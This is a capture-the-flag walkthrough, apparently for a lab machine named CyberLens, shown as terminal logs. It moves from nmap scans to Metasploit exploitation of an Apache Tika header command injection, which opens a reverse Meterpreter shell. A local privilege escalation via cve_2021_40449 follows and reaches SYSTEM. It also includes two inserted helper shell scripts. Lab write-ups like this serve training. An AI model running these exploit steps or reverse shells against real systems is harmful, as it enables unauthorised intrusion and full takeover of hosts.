┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -T4 -p- -Pn cyberlens.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-18 20:09 EEST
Nmap scan report for cyberlens.thm (10.10.197.190)
Host is up (0.12s latency).
Not shown: 65519 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49677/tcp open  unknown
61777/tcp open  unknown
Nmap done: 1 IP address (1 host up) scanned in 335.20 seconds
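Between the full-range SYN scan above and the -sC -sV scan that follows, the open-port list was trimmed by hand: the 49664-49677 block (Windows RPC endpoints in the dynamic range) was dropped and the isolated high port 61777 was kept. The following is an added example, not part of the original walkthrough, that automates that step: a POSIX shell function reads nmap's normal output on stdin and prints the port list for the second scan. The rule "drop unnamed high ports that sit in a tight cluster" is the editor's heuristic for spotting the RPC block, not anything nmap reports, and the safe default remains running -sV against every open port. The sample input is the port table as printed above.

```bash
#!/bin/sh
# Added example, not from the original walkthrough: build the -p argument for
# the follow-up -sC -sV scan from the normal output of the first -p- scan.

# Constructed sample input: the open-port table exactly as nmap printed it.
SAMPLE_NMAP='PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49677/tcp open  unknown
61777/tcp open  unknown'

# open_ports: every open TCP port, comma-separated, in the order nmap listed it.
# Usage: nmap -sS -p- -Pn host | open_ports
open_ports() {
    awk '$1 ~ /^[0-9]+\/tcp$/ && $2 == "open" {
             sub(/\/tcp$/, "", $1)
             p = p (p == "" ? "" : ",") $1
         }
         END { print p }'
}

# triage_ports: same list minus the Windows RPC endpoint block. Heuristic
# (editor's assumption, not something nmap reports): a port nmap could not
# name ("unknown") that lies in the dynamic range (>= 49152) and has another
# such port within 32 of it is treated as part of the sequentially allocated
# RPC block and dropped. An isolated high port such as 61777 survives.
triage_ports() {
    awk '$1 ~ /^[0-9]+\/tcp$/ && $2 == "open" {
             sub(/\/tcp$/, "", $1)
             n++; port[n] = $1 + 0; svc[n] = $3
         }
         END {
             for (i = 1; i <= n; i++) {
                 keep = 1
                 if (svc[i] == "unknown" && port[i] >= 49152)
                     for (j = 1; j <= n; j++)
                         if (j != i && svc[j] == "unknown" &&
                             port[j] - port[i] < 32 && port[i] - port[j] < 32)
                             keep = 0
                 if (keep) p = p (p == "" ? "" : ",") port[i]
             }
             print p
         }'
}

# Stand-alone run: print both lists for the sample above.
printf '%s\n' "$SAMPLE_NMAP" | open_ports
printf '%s\n' "$SAMPLE_NMAP" | triage_ports
```

In a live scan the two functions are fed from `nmap ... | tee first.nmap` and the result goes straight into `-p"$(triage_ports < first.nmap)"`; if the heuristic ever drops something you care about, fall back to `open_ports`.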
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -p80,135,139,445,3389,5985,47001,61777 -Pn cyberlens.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-18 21:10 EEST
Nmap scan report for cyberlens.thm (10.10.41.34)
Host is up (0.13s latency).
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Apache httpd 2.4.57 ((Win64))
|_http-title: CyberLens: Unveiling the Hidden Matrix
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.57 (Win64)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: CYBERLENS
|   NetBIOS_Domain_Name: CYBERLENS
|   NetBIOS_Computer_Name: CYBERLENS
|   DNS_Domain_Name: CyberLens
|   DNS_Computer_Name: CyberLens
|   Product_Version: 10.0.17763
|_  System_Time: 2024-05-18T18:10:14+00:00
|_ssl-date: 2024-05-18T18:10:23+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=CyberLens
| Not valid before: 2024-05-17T18:05:59
|_Not valid after:  2024-11-16T18:05:59
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
61777/tcp open  http          Jetty 8.y.z-SNAPSHOT
|_http-server-header: Jetty(8.y.z-SNAPSHOT)
| http-methods: 
|_  Potentially risky methods: PUT
|_http-cors: HEAD GET
|_http-title: Site doesn't have a title (text/plain).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-05-18T18:10:15
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.02 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV --script vulners --script-args mincvss=7.5 -p80,135,139,445,3389,5985,47001,61777 -Pn cyberlens.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-18 21:12 EEST
Nmap scan report for cyberlens.thm (10.10.41.34)
Host is up (0.14s latency).
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Apache httpd 2.4.57 ((Win64))
| vulners: 
|   cpe:/a:apache:http_server:2.4.57: 
|       B0A9E5E8-7CCC-5984-9922-A89F11D6BF38  0.0  https://vulners.com/githubexploit/B0A9E5E8-7CCC-5984-9922-A89F11D6BF38  *EXPLOIT*
|_      45D138AD-BEC6-552A-91EA-8816914CA7F4  0.0  https://vulners.com/githubexploit/45D138AD-BEC6-552A-91EA-8816914CA7F4  *EXPLOIT*
|_http-server-header: Apache/2.4.57 (Win64)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
61777/tcp open  http          Jetty 8.y.z-SNAPSHOT
|_http-server-header: Jetty(8.y.z-SNAPSHOT)
| vulners: 
|   cpe:/a:mortbay:jetty:8.y.z-snapshot: 
|_      SSV:26121  7.8  https://vulners.com/seebug/SSV:26121  *EXPLOIT*
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.55 seconds
┌──(kali㉿kali)-[~]
└─$ sudo msfdb init && msfconsole
[i] Database already started
[i] The database appears to be already configured, skipping initialization
Metasploit tip: You can pivot connections over sessions started with the
ssh_login modules
=[ metasploit v6.4.5-dev ]
+ -- --=[ 2413 exploits - 1242 auxiliary - 423 post ]
+ -- --=[ 1468 payloads - 47 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search Tika
Matching Modules
================
   #  Name                                                 Disclosure Date  Rank       Check  Description
   -  ----                                                 ---------------  ----       -----  -----------
   0  exploit/windows/http/apache_tika_jp2_jscript         2018-04-25       excellent  Yes    Apache Tika Header Command Injection
   1  post/linux/gather/puppet                             .                normal     No     Puppet Config Gather
   2  auxiliary/scanner/http/wp_gimedia_library_file_read  .                normal     No     WordPress GI-Media Library Plugin Directory Traversal Vulnerability
Interact with a module by name or index. For example info 2, use 2 or use auxiliary/scanner/http/wp_gimedia_library_file_read
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/apache_tika_jp2_jscript) > show options
Module options (exploit/windows/http/apache_tika_jp2_jscript):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      9998             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.126.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows
View the full module info with the info, or info -d command.
msf6 exploit(windows/http/apache_tika_jp2_jscript) > set SRVHOST 10.11.85.12
SRVHOST => 10.11.85.12
msf6 exploit(windows/http/apache_tika_jp2_jscript) > set RHOSTS cyberlens.thm
RHOSTS => cyberlens.thm
msf6 exploit(windows/http/apache_tika_jp2_jscript) > set RPORT 61777
RPORT => 61777
msf6 exploit(windows/http/apache_tika_jp2_jscript) > set VHOST cyberlens.thm
VHOST => cyberlens.thm
msf6 exploit(windows/http/apache_tika_jp2_jscript) > set LHOST 10.11.85.12
LHOST => 10.11.85.12
msf6 exploit(windows/http/apache_tika_jp2_jscript) > run
[*] Started reverse TCP handler on 10.11.85.12:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 8.10% done (7999/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 16.19% done (15998/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 24.29% done (23997/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 32.39% done (31996/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 40.48% done (39995/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 48.58% done (47994/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 56.67% done (55993/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 64.77% done (63992/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 72.87% done (71991/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 80.96% done (79990/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 89.06% done (87989/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 97.16% done (95988/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Sending stage (176198 bytes) to 10.10.41.34
[*] Command Stager progress - 100.00% done (98798/98798 bytes)
[*] Meterpreter session 1 opened (10.11.85.12:4444 -> 10.10.41.34:49786) at 2024-05-18 21:21:57 +0300
meterpreter > shell
Process 5840 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
cyberlens\cyberlens
C:\Windows\system32>dir C:\Users
dir C:\Users
Volume in drive C has no label.
Volume Serial Number is A8A4-C362
Directory of C:\Users
06/06/2023 07:48 PM <DIR> .
06/06/2023 07:48 PM <DIR> ..
03/17/2021 03:13 PM <DIR> Administrator
11/25/2023 07:31 AM <DIR> CyberLens
12/12/2018 07:45 AM <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 14,950,584,320 bytes free
C:\Windows\system32>type C:\Users\CyberLens\Desktop\user.txt
type C:\Users\CyberLens\Desktop\user.txt
--SNIP--
meterpreter >
Background session 2? [y/N]
msf6 exploit(windows/http/apache_tika_jp2_jscript) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > setg SESSION 2
SESSION => 2
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.108.65 - Collecting local exploits for x64/windows...
[*] 10.10.108.65 - 193 exploit checks are being tried...
[+] 10.10.108.65 - exploit/windows/local/always_install_elevated: The target is vulnerable.
[+] 10.10.108.65 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/bypassuac_sluihijack: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/cve_2020_1337_printerdemon: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/cve_2021_40449: The target appears to be vulnerable. Vulnerable Windows 10 v1809 build detected!
[+] 10.10.108.65 - exploit/windows/local/cve_2022_21882_win32k: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/cve_2022_21999_spoolfool_privesc: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[*] Running check method for exploit 45 / 45
[*] 10.10.108.65 - Valid modules for session 2:
============================
 #   Name                                                            Potentially Vulnerable?  Check Result
 -   ----                                                            -----------------------  ------------
 1   exploit/windows/local/always_install_elevated                   Yes                      The target is vulnerable.
 2   exploit/windows/local/bypassuac_dotnet_profiler                 Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/bypassuac_sdclt                           Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/bypassuac_sluihijack                      Yes                      The target appears to be vulnerable.
 5   exploit/windows/local/cve_2020_1048_printerdemon                Yes                      The target appears to be vulnerable.
 6   exploit/windows/local/cve_2020_1337_printerdemon                Yes                      The target appears to be vulnerable.
 7   exploit/windows/local/cve_2021_40449                            Yes                      The target appears to be vulnerable. Vulnerable Windows 10 v1809 build detected!
 8   exploit/windows/local/cve_2022_21882_win32k                     Yes                      The target appears to be vulnerable.
 9   exploit/windows/local/cve_2022_21999_spoolfool_privesc          Yes                      The target appears to be vulnerable.
 10  exploit/windows/local/ms16_032_secondary_logon_handle_privesc   Yes                      The service is running, but could not be validated.
 11  exploit/windows/local/agnitum_outpost_acs                       No                       The target is not exploitable.
 12  exploit/windows/local/bits_ntlm_token_impersonation             No                       The target is not exploitable.
 13  exploit/windows/local/bypassuac_eventvwr                        No                       The target is not exploitable.
 14  exploit/windows/local/bypassuac_fodhelper                       No                       The target is not exploitable.
 15  exploit/windows/local/canon_driver_privesc                      No                       The target is not exploitable. No Canon TR150 driver directory found
 16  exploit/windows/local/capcom_sys_exec                           No                       Cannot reliably check exploitability.
 17  exploit/windows/local/cve_2019_1458_wizardopium                 No                       The target is not exploitable.
 18  exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move    No                       The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
 19  exploit/windows/local/cve_2020_0796_smbghost                    No                       The target is not exploitable.
 20  exploit/windows/local/cve_2020_1054_drawiconex_lpe              No                       The target is not exploitable. No target for win32k.sys version 10.0.17763.557
 21  exploit/windows/local/cve_2020_1313_system_orchestrator         No                       The target is not exploitable.
 22  exploit/windows/local/cve_2020_17136                            No                       The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
 23  exploit/windows/local/cve_2021_21551_dbutil_memmove             No                       The target is not exploitable.
 24  exploit/windows/local/cve_2022_3699_lenovo_diagnostics_driver   No                       The target is not exploitable.
 25  exploit/windows/local/cve_2023_21768_afd_lpe                    No                       The target is not exploitable. The exploit only supports Windows 11 22H2
 26  exploit/windows/local/cve_2023_28252_clfs_driver                No                       The target is not exploitable.
 27  exploit/windows/local/gog_galaxyclientservice_privesc           No                       The target is not exploitable. Galaxy Client Service not found
 28  exploit/windows/local/ikeext_service                            No                       The check raised an exception.
 29  exploit/windows/local/lexmark_driver_privesc                    No                       The target is not exploitable. No Lexmark print drivers in the driver store
 30  exploit/windows/local/ms10_092_schelevator                      No                       The target is not exploitable. Windows Server 2019 (10.0 Build 17763). is not vulnerable
 31  exploit/windows/local/ms14_058_track_popup_menu                 No                       Cannot reliably check exploitability.
 32  exploit/windows/local/ms15_051_client_copy_image                No                       The target is not exploitable.
 33  exploit/windows/local/ms15_078_atmfd_bof                        No                       Cannot reliably check exploitability.
 34  exploit/windows/local/ms16_014_wmi_recv_notif                   No                       The target is not exploitable.
 35  exploit/windows/local/ms16_075_reflection                       No                       The target is not exploitable.
 36  exploit/windows/local/ms16_075_reflection_juicy                 No                       The target is not exploitable.
 37  exploit/windows/local/ntapphelpcachecontrol                     No                       The check raised an exception.
 38  exploit/windows/local/nvidia_nvsvc                              No                       The check raised an exception.
 39  exploit/windows/local/panda_psevents                            No                       The target is not exploitable.
 40  exploit/windows/local/ricoh_driver_privesc                      No                       The target is not exploitable. No Ricoh driver directory found
 41  exploit/windows/local/srclient_dll_hijacking                    No                       The target is not exploitable. Target is not Windows Server 2012.
 42  exploit/windows/local/tokenmagic                                No                       The target is not exploitable.
 43  exploit/windows/local/virtual_box_opengl_escape                 No                       The target is not exploitable.
 44  exploit/windows/local/webexec                                   No                       The check raised an exception.
 45  exploit/windows/local/win_error_cve_2023_36874                  No                       The target is not exploitable.
[*] Post module execution completed
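The suggester output above carries three grades of check result: one "The target is vulnerable." (always_install_elevated, whose check reads the two AlwaysInstallElevated policy values out of the registry), eight "appears to be vulnerable" (a build or service match only), and one that "could not be validated". The walkthrough goes straight to cve_2021_40449, a win32k kernel exploit that can blue-screen the target and cost you the shell if the build is not exactly what the module expects, while a confirmed, userland candidate was sitting at the top of the list. The following is an added example, not part of the original walkthrough: a shell function that ranks the [+] lines by check confidence and pushes kernel-mode modules down at equal confidence. The scoring and the pattern used to recognise kernel-mode modules are the editor's assumptions, not anything the suggester does; the sample input is the [+] lines as printed above.

```bash
#!/bin/sh
# Added example, not from the original walkthrough: rank the [+] candidates
# printed by post/multi/recon/local_exploit_suggester by check confidence.
# Scoring is the editor's assumption, not anything the module itself does.

# Constructed sample input: the [+] lines exactly as the suggester printed them.
SAMPLE_SUGGESTER='[+] 10.10.108.65 - exploit/windows/local/always_install_elevated: The target is vulnerable.
[+] 10.10.108.65 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/bypassuac_sluihijack: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/cve_2020_1337_printerdemon: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/cve_2021_40449: The target appears to be vulnerable. Vulnerable Windows 10 v1809 build detected!
[+] 10.10.108.65 - exploit/windows/local/cve_2022_21882_win32k: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/cve_2022_21999_spoolfool_privesc: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.'

# rank_suggestions: read suggester output on stdin, print "score module" lines,
# highest score first, ties broken by module name.
#   6  check said "The target is vulnerable."      (positive evidence)
#   4  check said "appears to be vulnerable"       (build/service match only)
#   2  anything else, e.g. "could not be validated"
#  +1  the check named the exact build it matched
#  -1  kernel-mode exploit (the win32k modules, cve_2021_40449 included):
#      a wrong build means a crash and a lost session, not a failed attempt
rank_suggestions() {
    awk '$1 == "[+]" {
             mod = $4; sub(/:$/, "", mod)
             result = substr($0, index($0, ": ") + 2)
             if (result ~ /^The target is vulnerable/)     score = 6
             else if (result ~ /appears to be vulnerable/) score = 4
             else                                          score = 2
             if (result ~ /build detected/)                score += 1
             if (mod ~ /win32k|cve_2021_40449/)            score -= 1
             printf "%d %s\n", score, mod
         }' | sort -k1,1nr -k2,2
}

# top_suggestion: the module name to try first
top_suggestion() {
    rank_suggestions | head -n 1 | cut -d' ' -f2
}

# Stand-alone run: ranked list for the sample above.
printf '%s\n' "$SAMPLE_SUGGESTER" | rank_suggestions
```

Feed it the real thing with `spool` in msfconsole or by copying the suggester output into a file and running `rank_suggestions < suggester.txt`; the point is only to make the order of attempts deliberate rather than whichever module caught the eye first.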
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/cve_2021_40449
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2021_40449) > run
[*] Started reverse TCP handler on 10.11.85.12:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Vulnerable Windows 10 v1809 build detected!
[*] Launching netsh to host the DLL...
[+] Process 5340 launched.
[*] Reflectively injecting the DLL into 5340...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (201798 bytes) to 10.10.108.65
[*] Meterpreter session 3 opened (10.11.85.12:4444 -> 10.10.108.65:49810) at 2024-05-19 11:02:02 +0300
meterpreter > shell
Process 5372 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>cd C:\
cd C:\
C:\>dir /s admin.txt
dir /s admin.txt
Volume in drive C has no label.
Volume Serial Number is A8A4-C362
Directory of C:\Users\Administrator\Desktop
11/27/2023 07:50 PM 24 admin.txt
1 File(s) 24 bytes